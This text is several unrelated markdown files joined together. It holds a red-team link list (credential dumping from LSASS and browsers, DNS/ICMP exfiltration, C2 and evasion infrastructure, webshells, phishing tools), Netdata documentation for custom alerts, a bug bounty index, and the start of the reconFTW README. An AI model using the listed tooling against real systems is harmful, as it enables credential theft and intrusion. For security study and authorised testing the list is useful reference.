- https://github.com/moonD4rk/HackBrowserData - hack-browser-data is an open-source tool that could help you decrypt data[passwords|bookmarks|cookies|history] from the browser.
- https://github.com/mwrlabs/SharpClipHistory - ClipHistory feature get the last 25 copy paste actions
- https://github.com/outflanknl/Dumpert - dump lsass using direct system calls and API unhooking
- https://github.com/b4rtik/SharpMiniDump - Create a minidump of the LSASS process from memory - using Dumpert
- https://github.com/b4rtik/ATPMiniDump - Evade WinDefender ATP credential-theft
- https://github.com/aas-n/spraykatz - remote procdump.exe, copy dump file to local system and pypykatz for analysis/extraction
- https://github.com/0x09AL/RdpThief - extract live rdp logins
- https://github.com/chrismaddalena/SharpCloud - Simple C# for checking for the existence of credential files related to AWS, Microsoft Azure, and Google Compute.
- https://github.com/djhohnstein/SharpChromium - .NET 4.0 CLR Project to retrieve Chromium data, such as cookies, history and saved logins.
- https://github.com/jfmaes/SharpHandler - This project reuses open handles to lsass to parse or minidump lsass
- https://github.com/V1V1/SharpScribbles - ThunderFox for Firefox Credentials, SitkyNotesExtract for "Notes as passwords"
- https://github.com/securesean/DecryptAutoLogon - Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon
- https://github.com/G0ldenGunSec/SharpSecDump - .Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py
- https://github.com/EncodeGroup/Gopher - C# tool to discover low hanging fruits like SessionGopher
- https://github.com/GhostPack/SharpDPAPI - DPAPI Creds via C#
- LSASS Dump Without Mimikatz
- https://github.com/Hackndo/lsassy
- https://github.com/aas-n/spraykatz
- https://github.com/b4rtik/SharpKatz - C# porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
- Credential harvesting Linux Specific
- https://github.com/huntergregal/mimipenguin
- https://github.com/n1nj4sec/mimipy
- https://github.com/dirtycow/dirtycow.github.io
- https://github.com/mthbernardes/sshLooterC - SSH Credential loot
- https://github.com/blendin/3snake - SSH / Sudo / SU Credential loot
- https://github.com/0xmitsurugi/gimmecredz
- https://github.com/TarlogicSecurity/tickey - Tool to extract Kerberos tickets from Linux kernel keys.
- Data Exfiltration - DNS/ICMP/Wifi Exfiltration
- https://github.com/FortyNorthSecurity/Egress-Assess
- https://github.com/p3nt4/Invoke-TmpDavFS
- https://github.com/DhavalKapil/icmptunnel
- https://github.com/iagox86/dnscat2
- https://github.com/Arno0x/DNSExfiltrator
- https://github.com/spieglt/FlyingCarpet - Wifi Exfiltration
- https://github.com/SECFORCE/Tunna - Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP
- https://github.com/sysdream/chashell
- https://github.com/no0be/DNSlivery - Easy files and payloads delivery over DNS
## Staging
- Rapid Attack Infrastructure (RAI) Red Team Infrastructure... Quick... Fast... Simplified One of the most tedious phases of a Red Team Operation is usually the infrastructure setup. This usually entails a teamserver or controller, domains, redirectors, and a Phishing server. https://github.com/obscuritylabs/RAI
- Red Baron is a set of modules and custom/third-party providers for Terraform which tries to automate creating resilient, disposable, secure and agile infrastructure for Red Teams. https://github.com/byt3bl33d3r/Red-Baron
- EvilURL generate unicode evil domains for IDN Homograph Attack and detect them. https://github.com/UndeadSec/EvilURL
- Domain Hunter checks expired domains, bluecoat categorization, and Archive.org history to determine good candidates for phishing and C2 domain names. https://github.com/threatexpress/domainhunter
- PowerDNS is a simple proof of concept to demonstrate the execution of PowerShell script using DNS only. https://github.com/mdsecactivebreach/PowerDNS
- Chameleon a tool for evading Proxy categorisation. https://github.com/mdsecactivebreach/Chameleon
- CatMyFish Search for categorized domain that can be used during red teaming engagement. Perfect to setup whitelisted domain for your Cobalt Strike beacon C&C. https://github.com/Mr-Un1k0d3r/CatMyFish
- Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. https://github.com/rsmudge/Malleable-C2-Profiles
- Malleable-C2-Randomizer This script randomizes Cobalt Strike Malleable C2 profiles through the use of a metalanguage, hopefully reducing the chances of flagging signature-based detection controls. https://github.com/bluscreenofjeff/Malleable-C2-Randomizer
- FindFrontableDomains search for potential frontable domains. https://github.com/rvrsh3ll/FindFrontableDomains
- Postfix-Server-Setup Setting up a phishing server is a very long and tedious process. It can take hours to setup, and can be compromised in minutes. https://github.com/n0pe-sled/Postfix-Server-Setup
- DomainFrontingLists a list of Domain Frontable Domains by CDN. https://github.com/vysec/DomainFrontingLists
- Apache2-Mod-Rewrite-Setup Quickly Implement Mod-Rewrite in your infastructure. https://github.com/n0pe-sled/Apache2-Mod-Rewrite-Setup
- mod_rewrite rule to evade vendor sandboxes. https://gist.github.com/curi0usJack/971385e8334e189d93a6cb4671238b10
- external_c2 framework a python framework for usage with Cobalt Strike's External C2. https://github.com/Und3rf10w/external_c2_framework
- Malleable-C2-Profiles A collection of profiles used in different projects using Cobalt Strike https://www.cobaltstrike.com/. https://github.com/xx0hcd/Malleable-C2-Profiles
- ExternalC2 a library for integrating communication channels with the Cobalt Strike External C2 server. https://github.com/ryhanson/ExternalC2
- cs2modrewrite a tools for convert Cobalt Strike profiles to modrewrite scripts. https://github.com/threatexpress/cs2modrewrite
- e2modrewrite a tools for convert Empire profiles to Apache modrewrite scripts. https://github.com/infosecn1nja/e2modrewrite
- redi automated script for setting up CobaltStrike redirectors (nginx reverse proxy, letsencrypt). https://github.com/taherio/redi
- cat-sites Library of sites for categorization. https://github.com/audrummer15/cat-sites
- ycsm is a quick script installation for resilient redirector using nginx reverse proxy and letsencrypt compatible with some popular Post-Ex Tools (Cobalt Strike, Empire, Metasploit, PoshC2). https://github.com/infosecn1nja/ycsm
- Domain Fronting Google App Engine. https://github.com/redteam-cyberark/Google-Domain-fronting
- DomainFrontDiscover Scripts and results for finding domain frontable CloudFront domains. https://github.com/peewpw/DomainFrontDiscover
- Automated Empire Infrastructure https://github.com/bneg/RedTeam-Automation
- Serving Random Payloads with NGINX. https://gist.github.com/jivoi/a33ace2e25515a31aa2ffbae246d98c9
- meek is a blocking-resistant pluggable transport for Tor. It encodes a data stream as a sequence of HTTPS requests and responses. https://github.com/arlolra/meek
- CobaltStrike-ToolKit Some useful scripts for CobaltStrike. https://github.com/killswitch-GUI/CobaltStrike-ToolKit
- mkhtaccess_red Auto-generate an HTaccess for payload delivery -- automatically pulls ips/nets/etc from known sandbox companies/sources that have been seen before, and redirects them to a benign payload. https://github.com/violentlydave/mkhtaccess_red
- RedFile a flask wsgi application that serves files with intelligence, good for serving conditional RedTeam payloads. https://github.com/outflanknl/RedFile
- keyserver Easily serve HTTP and DNS keys for proper payload protection. https://github.com/leoloobeek/keyserver
- DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike (https://www.cobaltstrike.com). https://github.com/SpiderLabs/DoHC2
- HTran is a connection bouncer, a kind of proxy server. A “listener” program is hacked stealthily onto an unsuspecting host anywhere on the Internet. https://github.com/HiwinCN/HTran
## Buffer Overflow and Exploit Development
- https://github.com/CyberSecurityUP/Buffer-Overflow-Labs
- https://github.com/gh0x0st/Buffer_Overflow
- https://github.com/freddiebarrsmith/Buffer-Overflow-Exploit-Development-Practice
- https://github.com/21y4d/Windows_BufferOverflowx32
- https://github.com/johnjhacking/Buffer-Overflow-Guide
- https://github.com/npapernot/buffer-overflow-attack
- https://github.com/V1n1v131r4/OSCP-Buffer-Overflow
- https://github.com/KINGSABRI/BufferOverflow-Kit
- https://github.com/FabioBaroni/awesome-exploit-development
- https://github.com/Gallopsled/pwntools
- https://github.com/hardenedlinux/linux-exploit-development-tutorial
- https://github.com/Billy-Ellis/Exploit-Challenges
- https://github.com/wtsxDev/Exploit-Development
## MindMaps by Joas
- https://www.mindmeister.com/pt/1746180947/web-attacks-bug-bounty-and-appsec-by-joas-antonio
- https://www.mindmeister.com/pt/1760781948/information-security-certifications-by-joas-antonio
- https://www.mindmeister.com/pt/1781013629/the-best-labs-and-ctf-red-team-and-pentest
- https://www.mindmeister.com/pt/1760781948/information-security-certifications-by-joas-antonio
- https://www.mindmeister.com/pt/1746187693/cyber-security-career-knowledge-by-joas-antonio
## Lateral Movement
- https://github.com/0xthirteen/SharpRDP
- https://github.com/0xthirteen/MoveKit
- https://github.com/0xthirteen/SharpMove
- https://github.com/rvrsh3ll/SharpCOM
- https://github.com/malcomvetter/CSExec
- https://github.com/byt3bl33d3r/CrackMapExec
- https://github.com/cube0x0/SharpMapExec
- https://github.com/nccgroup/WMIcmd
- https://github.com/rasta-mouse/MiscTools
- https://github.com/byt3bl33d3r/DeathStar
- https://github.com/SpiderLabs/portia
- https://github.com/Screetsec/Vegile
- https://github.com/DanMcInerney/icebreaker
- https://github.com/MooseDojo/apt2
- https://github.com/hdm/nextnet
- https://github.com/mubix/IOXIDResolver
- https://github.com/Hackplayers/evil-winrm
- https://github.com/bohops/WSMan-WinRM
- https://github.com/dirkjanm/krbrelayx
- https://github.com/Mr-Un1k0d3r/SCShell
- https://github.com/rvazarkar/GMSAPasswordReader
- https://github.com/fdiskyou/hunter
- https://github.com/360-Linton-Lab/WMIHACKER
- https://github.com/leechristensen/SpoolSample
- https://github.com/leftp/SpoolSamplerNET
- https://github.com/lexfo/rpc2socks
- https://github.com/checkymander/sshiva
- https://github.com/dev-2null/ADCollector
## POST Exploitation
- https://github.com/mubix/post-exploitation
- https://github.com/emilyanncr/Windows-Post-Exploitation
- https://github.com/nettitude/Invoke-PowerThIEf
- https://github.com/ThunderGunExpress/BADministration
- https://github.com/bohops/SharpRDPHijack
- https://github.com/antonioCoco/RunasCs
- https://github.com/klsecservices/Invoke-Vnc
- https://github.com/mandatoryprogrammer/CursedChrome
- https://github.com/djhohnstein/WireTap
- https://github.com/GhostPack/Lockless
- https://github.com/infosecn1nja/SharpDoor
- Phishing Tools
- https://github.com/hlldz/pickl3
- https://github.com/shantanu561993/SharpLoginPrompt
- https://github.com/Dviros/CredsLeaker
- https://github.com/bitsadmin/fakelogonscreen
- https://github.com/CCob/PinSwipe
## Wrapper for various tools
- https://github.com/bohops/GhostBuild
- https://github.com/S3cur3Th1sSh1t/PowerSharpPack
- https://github.com/rvrsh3ll/Rubeus-Rundll32
- https://github.com/checkymander/Zolom
## Active Directory Audit and exploit tools
- https://github.com/mwrlabs/SharpGPOAbuse
- https://github.com/BloodHoundAD/BloodHound
- https://github.com/BloodHoundAD/SharpHound3
- https://github.com/chryzsh/awesome-bloodhound
- https://github.com/hausec/Bloodhound-Custom-Queries
- https://github.com/CompassSecurity/BloodHoundQueries
- https://github.com/vletoux/pingcastle
- https://github.com/cyberark/ACLight
- https://github.com/canix1/ADACLScanner
- https://github.com/fox-it/Invoke-ACLPwn
- https://github.com/NinjaStyle82/rbcd_permissions
- https://github.com/NotMedic/NetNTLMtoSilverTicket
- https://github.com/dirkjanm/ldapdomaindump
## Web Vulnerability Scanner / Burp Plugins
- https://github.com/m4ll0k/WAScan - all in one scanner
- https://github.com/s0md3v/XSStrike - XSS discovery
- https://github.com/federicodotta/Java-Deserialization-Scanner
- https://github.com/d3vilbug/HackBar
- https://github.com/gyoisamurai/GyoiThon
- https://github.com/snoopysecurity/awesome-burp-extensions
- https://github.com/sting8k/BurpSuite_403Bypasser - Burpsuite Extension to bypass 403 restricted directory
- https://github.com/BishopFox/GadgetProbe
## Web Exploitation Tools
- https://github.com/OsandaMalith/LFiFreak - lfi
- https://github.com/enjoiz/XXEinjector - xxe
- https://github.com/tennc/webshell - shellz
- https://github.com/flozz/p0wny-shell
- https://github.com/epinna/tplmap - ssti
- https://github.com/orf/xcat - xpath injection
- https://github.com/almandin/fuxploider - File Uploads
- https://github.com/nccgroup/freddy - deserialization
- https://github.com/irsdl/IIS-ShortName-Scanner - IIS Short Filename Vuln. exploitation
- https://github.com/frohoff/ysoserial - Deserialize Java Exploitation
- https://github.com/pwntester/ysoserial.net - Deserialize .NET Exploitation
- https://github.com/internetwache/GitTools - Exploit .git Folder Existence
- https://github.com/cujanovic/SSRF-Testing - SSRF Tutorials
- https://github.com/ambionics/phpggc - PHP Unserialize Payload generator
- https://github.com/BuffaloWill/oxml_xxe - Malicious Office XXE payload generator
- https://github.com/tijme/angularjs-csti-scanner - Angularjs Csti Scanner
- https://github.com/0xacb/viewgen - Deserialize .NET Viewstates
- https://github.com/Illuminopi/RCEvil.NET - Deserialize .NET Viewstates
## Linux Privilege Escalation / Audit
- https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS - powerfull Privilege Escalation Check Script with nice output
- https://github.com/mzet-/linux-exploit-suggester
- https://github.com/rebootuser/LinEnum
- https://github.com/diego-treitos/linux-smart-enumeration
- https://github.com/CISOfy/lynis
- https://github.com/AlessandroZ/BeRoot
- https://github.com/future-architect/vuls
- https://github.com/ngalongc/AutoLocalPrivilegeEscalation
- https://github.com/b3rito/yodo
- https://github.com/belane/linux-soft-exploit-suggester - lookup vulnerable installed software
- https://github.com/sevagas/swap_digger
- https://github.com/NullArray/RootHelper
- https://github.com/NullArray/MIDA-Multitool
- https://github.com/initstring/dirty_sock
- https://github.com/jondonas/linux-exploit-suggester-2
- https://github.com/sosdave/KeyTabExtract
- https://github.com/DominicBreuker/pspy
- https://github.com/itsKindred/modDetective
- https://github.com/nongiach/sudo_inject
- https://github.com/Anon-Exploiter/SUID3NUM - find suid bins and look them up under gtfobins / exploitable or not
- https://github.com/nccgroup/GTFOBLookup - Offline GTFOBins
- https://github.com/TH3xACE/SUDO_KILLER - sudo misconfiguration exploitation
- https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py
- https://github.com/inquisb/unix-privesc-check
- https://github.com/hc0d3r/tas - easily manipulate the tty and create fake binaries
- https://github.com/SecWiki/linux-kernel-exploits
- https://github.com/initstring/uptux
- https://github.com/andrew-d/static-binaries - not really privesc but helpfull
## Command and Control
- Cobalt Strike is software for Adversary Simulations and Red Team Operations. https://cobaltstrike.com/
- Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. https://github.com/EmpireProject/Empire
- Metasploit Framework is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development. https://github.com/rapid7/metasploit-framework
- SILENTTRINITY A post-exploitation agent powered by Python, IronPython, C#/.NET. https://github.com/byt3bl33d3r/SILENTTRINITY
- Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python. https://github.com/n1nj4sec/pupy
- Koadic or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. https://github.com/zerosum0x0/koadic
- PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. https://github.com/nettitude/PoshC2_Python
- Gcat a stealthy Python based backdoor that uses Gmail as a command and control server. https://github.com/byt3bl33d3r/gcat
- TrevorC2 is a legitimate website (browsable) that tunnels client/server communications for covert command execution. https://github.com/trustedsec/trevorc2
- Merlin is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in golang. https://github.com/Ne0nd0g/merlin
- Quasar is a fast and light-weight remote administration tool coded in C#. Providing high stability and an easy-to-use user interface, Quasar is the perfect remote administration solution for you. https://github.com/quasar/QuasarRAT
- Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers. https://github.com/cobbr/Covenant
- FactionC2 is a C2 framework which use websockets based API that allows for interacting with agents and transports. https://github.com/FactionC2/
- DNScat2 is a tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol. https://github.com/iagox86/dnscat2
- Sliver is a general purpose cross-platform implant framework that supports C2 over Mutual-TLS, HTTP(S), and DNS. https://github.com/BishopFox/sliver
- EvilOSX An evil RAT (Remote Administration Tool) for macOS / OS X. https://github.com/Marten4n6/EvilOSX
- EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. https://github.com/neoneggplant/EggShell
## Adversary Emulation
- MITRE CALDERA - An automated adversary emulation system that performs post-compromise adversarial behavior within Windows Enterprise networks. https://github.com/mitre/caldera
- APTSimulator - A Windows Batch script that uses a set of tools and output files to make a system look as if it was compromised. https://github.com/NextronSystems/APTSimulator
- Atomic Red Team - Small and highly portable detection tests mapped to the Mitre ATT&CK Framework. https://github.com/redcanaryco/atomic-red-team
- Network Flight Simulator - flightsim is a lightweight utility used to generate malicious network traffic and help security teams to evaluate security controls and network visibility. https://github.com/alphasoc/flightsim
- Metta - A security preparedness tool to do adversarial simulation. https://github.com/uber-common/metta
- Red Team Automation (RTA) - RTA provides a framework of scripts designed to allow blue teams to test their detection capabilities against malicious tradecraft, modeled after MITRE ATT&CK. https://github.com/endgameinc/RTA
## Repositores
- https://github.com/infosecn1nja/Red-Teaming-Toolkit
- https://github.com/S3cur3Th1sSh1t/Pentest-Tools
- https://github.com/yeyintminthuhtut/Awesome-Red-Teaming
- https://github.com/enaqx/awesome-pentest
- https://github.com/Muhammd/Awesome-Pentest
- https://github.com/CyberSecurityUP/Awesome-PenTest-Practice
- https://drive.google.com/drive/u/0/folders/12Mvq6kE2HJDwN2CZhEGWizyWt87YunkU
- https://github.com/0x4D31/awesome-oscp
- https://github.com/six2dez/OSCP-Human-Guide
- https://github.com/RustyShackleford221/OSCP-Prep
- https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
## Malware Analysis and Reverse Engineering
- https://github.com/rshipp/awesome-malware-analysis
- https://github.com/topics/malware-analysis
- https://github.com/Apress/malware-analysis-detection-engineering
- https://github.com/SpiderLabs/malware-analysis
- https://github.com/ytisf/theZoo
- https://github.com/arxlan786/Malware-Analysis
- https://github.com/nheijmans/malzoo
- https://github.com/mikesiko/PracticalMalwareAnalysis-Labs
- https://github.com/secrary/SSMA
- https://github.com/merces/aleph
- https://github.com/mentebinaria/retoolkit
- https://github.com/mytechnotalent/Reverse-Engineering
- https://github.com/wtsxDev/reverse-engineering
- https://github.com/mentebinaria/retoolkit
- https://github.com/topics/reverse-engineering
- https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
- https://github.com/NationalSecurityAgency/ghidra
- https://github.com/hax0rtahm1d/Reverse-Engineering
- https://github.com/tylerha97/awesome-reversing
|
# Custom Agent alert notifications
Netdata Agent's alert notification feature allows you to send custom notifications to any endpoint you choose.
> ### Note
>
> This file assumes you have read the [Introduction to Agent alert notifications](https://github.com/netdata/netdata/blob/master/health/notifications/README.md), detailing how the Netdata Agent's alert notification method works.
## Prerequisites
You need to have terminal access to the Agent you wish to configure.
## Configure Netdata to send alert notifications to a custom endpoint
> ### Info
>
> This file mentions editing configuration files.
>
> - To edit configuration files in a safe way, we provide the [`edit config` script](https://github.com/netdata/netdata/blob/master/docs/configure/nodes.md#use-edit-config-to-edit-configuration-files) located in your [Netdata config directory](https://github.com/netdata/netdata/blob/master/docs/configure/nodes.md#the-netdata-config-directory) (typically is `/etc/netdata`) that creates the proper file and opens it in an editor automatically.
> Note that to run the script you need to be inside your Netdata config directory.
>
> It is recommended to use this way for configuring Netdata.
Edit `health_alarm_notify.conf`, changes to this file do not require restarting Netdata:
1. Set `SEND_CUSTOM` to `YES`.
2. The `DEFAULT_RECIPIENT_CUSTOM`'s value is dependent on how you handle the `${to}` variable inside the `custom_sender()` function.
All roles will default to this variable if left unconfigured.
3. Edit the `custom_sender()` function.
You can look at the other senders in `/usr/libexec/netdata/plugins.d/alarm-notify.sh` for examples of how to modify the function in this configuration file.
The following is a sample `custom_sender()` function in `health_alarm_notify.conf`, to send an SMS via an imaginary HTTPS endpoint to the SMS gateway:
```sh
custom_sender() {
# example human readable SMS
local msg="${host} ${status_message}: ${alarm} ${raised_for}"
# limit it to 160 characters and encode it for use in a URL
urlencode "${msg:0:160}" >/dev/null; msg="${REPLY}"
# a space separated list of the recipients to send alerts to
to="${1}"
for phone in ${to}; do
httpcode=$(docurl -X POST \
--data-urlencode "From=XXX" \
--data-urlencode "To=${phone}" \
--data-urlencode "Body=${msg}" \
-u "${accountsid}:${accounttoken}" \
https://domain.website.com/)
if [ "${httpcode}" = "200" ]; then
info "sent custom notification ${msg} to ${phone}"
sent=$((sent + 1))
else
error "failed to send custom notification ${msg} to ${phone} with HTTP error code ${httpcode}."
fi
done
}
```
The supported variables that you can use for the function's `msg` variable are:
| Variable name | Description |
|:---------------------------:|:---------------------------------------------------------------------------------|
| `${alarm}` | Like "name = value units" |
| `${status_message}` | Like "needs attention", "recovered", "is critical" |
| `${severity}` | Like "Escalated to CRITICAL", "Recovered from WARNING" |
| `${raised_for}` | Like "(alert was raised for 10 minutes)" |
| `${host}` | The host generated this event |
| `${url_host}` | Same as ${host} but URL encoded |
| `${unique_id}` | The unique id of this event |
| `${alarm_id}` | The unique id of the alert that generated this event |
| `${event_id}` | The incremental id of the event, for this alert id |
| `${when}` | The timestamp this event occurred |
| `${name}` | The name of the alert, as given in netdata health.d entries |
| `${url_name}` | Same as ${name} but URL encoded |
| `${chart}` | The name of the chart (type.id) |
| `${url_chart}` | Same as ${chart} but URL encoded |
| `${family}` | The family of the chart |
| `${url_family}` | Same as ${family} but URL encoded |
| `${status}` | The current status : REMOVED, UNINITIALIZED, UNDEFINED, CLEAR, WARNING, CRITICAL |
| `${old_status}` | The previous status: REMOVED, UNINITIALIZED, UNDEFINED, CLEAR, WARNING, CRITICAL |
| `${value}` | The current value of the alert |
| `${old_value}` | The previous value of the alert |
| `${src}` | The line number and file the alert has been configured |
| `${duration}` | The duration in seconds of the previous alert state |
| `${duration_txt}` | Same as ${duration} for humans |
| `${non_clear_duration}` | The total duration in seconds this is/was non-clear |
| `${non_clear_duration_txt}` | Same as ${non_clear_duration} for humans |
| `${units}` | The units of the value |
| `${info}` | A short description of the alert |
| `${value_string}` | Friendly value (with units) |
| `${old_value_string}` | Friendly old value (with units) |
| `${image}` | The URL of an image to represent the status of the alert |
| `${color}` | A color in AABBCC format for the alert |
| `${goto_url}` | The URL the user can click to see the netdata dashboard |
| `${calc_expression}` | The expression evaluated to provide the value for the alert |
| `${calc_param_values}` | The value of the variables in the evaluated expression |
| `${total_warnings}` | The total number of alerts in WARNING state on the host |
| `${total_critical}` | The total number of alerts in CRITICAL state on the host |
You can then have different `${to}` variables per **role**, by editing `DEFAULT_RECIPIENT_CUSTOM` with the variable you want, in the following entries at the bottom of the same file:
```conf
role_recipients_custom[sysadmin]="systems"
role_recipients_custom[domainadmin]="domains"
role_recipients_custom[dba]="databases systems"
role_recipients_custom[webmaster]="marketing development"
role_recipients_custom[proxyadmin]="proxy-admin"
role_recipients_custom[sitemgr]="sites"
```
An example working configuration would be:
```conf
#------------------------------------------------------------------------------
# custom notifications
SEND_CUSTOM="YES"
DEFAULT_RECIPIENT_CUSTOM=""
# The custom_sender() is a custom function to do whatever you need to do
custom_sender() {
# example human readable SMS
local msg="${host} ${status_message}: ${alarm} ${raised_for}"
# limit it to 160 characters and encode it for use in a URL
urlencode "${msg:0:160}" >/dev/null; msg="${REPLY}"
# a space separated list of the recipients to send alerts to
to="${1}"
for phone in ${to}; do
httpcode=$(docurl -X POST \
--data-urlencode "From=XXX" \
--data-urlencode "To=${phone}" \
--data-urlencode "Body=${msg}" \
-u "${accountsid}:${accounttoken}" \
https://domain.website.com/)
if [ "${httpcode}" = "200" ]; then
info "sent custom notification ${msg} to ${phone}"
sent=$((sent + 1))
else
error "failed to send custom notification ${msg} to ${phone} with HTTP error code ${httpcode}."
fi
done
}
```
## Test the notification method
To test this alert notification method refer to the ["Testing Alert Notifications"](https://github.com/netdata/netdata/blob/master/health/notifications/README.md#testing-alert-notifications) section of the Agent alert notifications page.
|
# Bug Bounty Notes
- [x] [XSS Methodology](https://github.com/JoshMorrison99/Bug-Bounty/tree/main/XSS)
- [x] [CSRF Methodology](https://github.com/JoshMorrison99/Bug-Bounty/tree/main/CSRF)
- [x] [Open Redirect Methodology](https://github.com/JoshMorrison99/Bug-Bounty/tree/main/Open%20Redirect)
- [x] [Cache Poisoning Methodology](https://github.com/JoshMorrison99/Bug-Bounty/tree/main/Cache%20Poisoning)
- [x] [Cache Deception Methodology](https://github.com/JoshMorrison99/Bug-Bounty/tree/main/Cache%20Deception)
- [ ] JWT Methodology
- [x] [HPP Methodology](https://github.com/JoshMorrison99/Bug-Bounty/tree/main/HPP)
# List of General Resources
- https://pentester.land/writeups/
- https://portswigger.net/
- https://hackerone.com/hacktivity
- https://medium.com/tag/bug-bounty
- https://twitter.com/hashtag/Bugbounty?src=hashtag_click
- https://twitter.com/hashtag/bugbountytips?src=hashtag_click
- https://www.youtube.com/results?search_query=bug+bounty&sp=EgIIAw%253D%253D
- https://github.com/KathanP19/HowToHunt
- https://github.com/daffainfo/AllAboutBugBounty
- https://github.com/0xmaximus/Galaxy-Bugbounty-Checklist
|
<h1 align="center">
<br>
<a href="https://github.com/six2dez/reconftw"><img src="https://github.com/six2dez/reconftw/blob/main/images/banner.png" alt="reconftw"></a>
<br>
reconFTW
<br>
</h1>
<p align="center">
<a href="https://github.com/six2dez/reconftw/releases/tag/v2.5">
<img src="https://img.shields.io/badge/release-v2.5-green">
</a>
</a>
<a href="https://www.gnu.org/licenses/gpl-3.0.en.html">
<img src="https://img.shields.io/badge/license-GPL3-_red.svg">
</a>
<a href="https://twitter.com/Six2dez1">
<img src="https://img.shields.io/badge/twitter-%40Six2dez1-blue">
</a>
<a href="https://github.com/six2dez/reconftw/issues?q=is%3Aissue+is%3Aclosed">
<img src="https://img.shields.io/github/issues-closed-raw/six2dez/reconftw.svg">
</a>
<a href="https://github.com/six2dez/reconftw/wiki">
<img src="https://img.shields.io/badge/doc-wiki-blue.svg">
</a>
<a href="https://t.me/joinchat/H5bAaw3YbzzmI5co">
<img src="https://img.shields.io/badge/telegram-@ReconFTW-blue.svg">
</a>
<a href="https://hub.docker.com/r/six2dez/reconftw">
<img alt="Docker Cloud Build Status" src="https://img.shields.io/docker/cloud/build/six2dez/reconftw">
</a>
</p>
<h3 align="center">Summary</h3>
**ReconFTW** automates the entire process of reconnaissance for you. It outperforms the work of subdomain enumeration along with various vulnerability checks and obtaining maximum information about your target.
ReconFTW uses a lot of techniques (passive, bruteforce, permutations, certificate transparency, source code scraping, analytics, DNS records...) for subdomain enumeration which helps you to get the maximum and the most interesting subdomains so that you be ahead of the competition.
It also performs various vulnerability checks like XSS, Open Redirects, SSRF, CRLF, LFI, SQLi, SSL tests, SSTI, DNS zone transfers, and much more. Along with these, it performs OSINT techniques, directory fuzzing, dorking, ports scanning, screenshots, nuclei scan on your target.
So, what are you waiting for? Go! Go! Go! :boom:
📔 Table of Contents
-----------------
- [💿 Installation:](#-installation)
- [a) In your PC/VPS/VM](#a-in-your-pcvpsvm)
- [b) Docker Image 🐳 (3 options)](#b-docker-image--3-options)
- [c) Terraform + Ansible](#c-terraform--ansible)
- [⚙️ Config file:](#️-config-file)
- [Usage:](#usage)
- [Example Usage:](#example-usage)
- [Axiom Support: :cloud:](#axiom-support-cloud)
- [BBRF Support: :computer:](#bbrf-support-computer)
- [Sample video:](#sample-video)
- [:fire: Features :fire:](#fire-features-fire)
- [Osint](#osint)
- [Subdomains](#subdomains)
- [Hosts](#hosts)
- [Webs](#webs)
- [Vulnerability checks](#vulnerability-checks)
- [Extras](#extras)
- [Mindmap/Workflow](#mindmapworkflow)
- [Data Keep](#data-keep)
- [Main commands:](#main-commands)
- [How to contribute:](#how-to-contribute)
- [Need help? :information_source:](#need-help-information_source)
- [Support this project](#support-this-project)
- [Buymeacoffee](#buymeacoffee)
- [DigitalOcean referral link](#digitalocean-referral-link)
- [GitHub sponsorship](#github-sponsorship)
- [Sponsors ❤️](#sponsors-️)
- [Thanks :pray:](#thanks-pray)
- [Disclaimer](#disclaimer)
---
# 💿 Installation:
## a) In your PC/VPS/VM
> You can check out our wiki for the installation guide [Installation Guide](https://github.com/six2dez/reconftw/wiki/0.-Installation-Guide) :book:
- Requires [Golang](https://golang.org/dl/) > **1.15.0+** installed and paths correctly set (**$GOPATH**, **$GOROOT**)
```bash
git clone https://github.com/six2dez/reconftw
cd reconftw/
./install.sh
./reconftw.sh -d target.com -r
```
## b) Docker Image 🐳 (3 options)
- Pull the image
```bash
$ docker pull six2dez/reconftw:main
```
- Run the container
```
$ docker run -it --rm \
-v "${PWD}/OutputFolder/":'/reconftw/Recon/' \
six2dez/reconftw:main -d example.com -r
```
However, if you wish to:
1. Dynamically modify the behaviour & function of the image
2. Build your own container
3. Build an Axiom Controller on top of the official image
Please refer to the [Docker](https://github.com/six2dez/reconftw/wiki/4.-Docker) documentation.
## c) Terraform + Ansible
Yes! reconFTW can also be easily deployed with Terraform and Ansible to AWS, if you want to know how to do it, you can check the guide [here](Terraform/README.md)
# ⚙️ Config file:
> You can find a detailed explanation of the configuration file [here](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book:
- Through ```reconftw.cfg``` file the whole execution of the tool can be controlled.
- Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more.
<details>
<br><br>
<summary> :point_right: Click here to view default config file :point_left: </summary>
```yaml
#################################################################
# reconFTW config file #
#################################################################
# General values
tools=~/Tools # Path installed tools
SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path
profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile
reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version
generate_resolvers=false # Generate custom resolvers with dnsvalidator
update_resolvers=true # Fetch and rewrite resolvers before DNS resolution
proxy_url="http://127.0.0.1:8080/" # Proxy url
install_golang=true # Set it to false if you already have Golang configured and ready
#dir_output=/custom/output/path
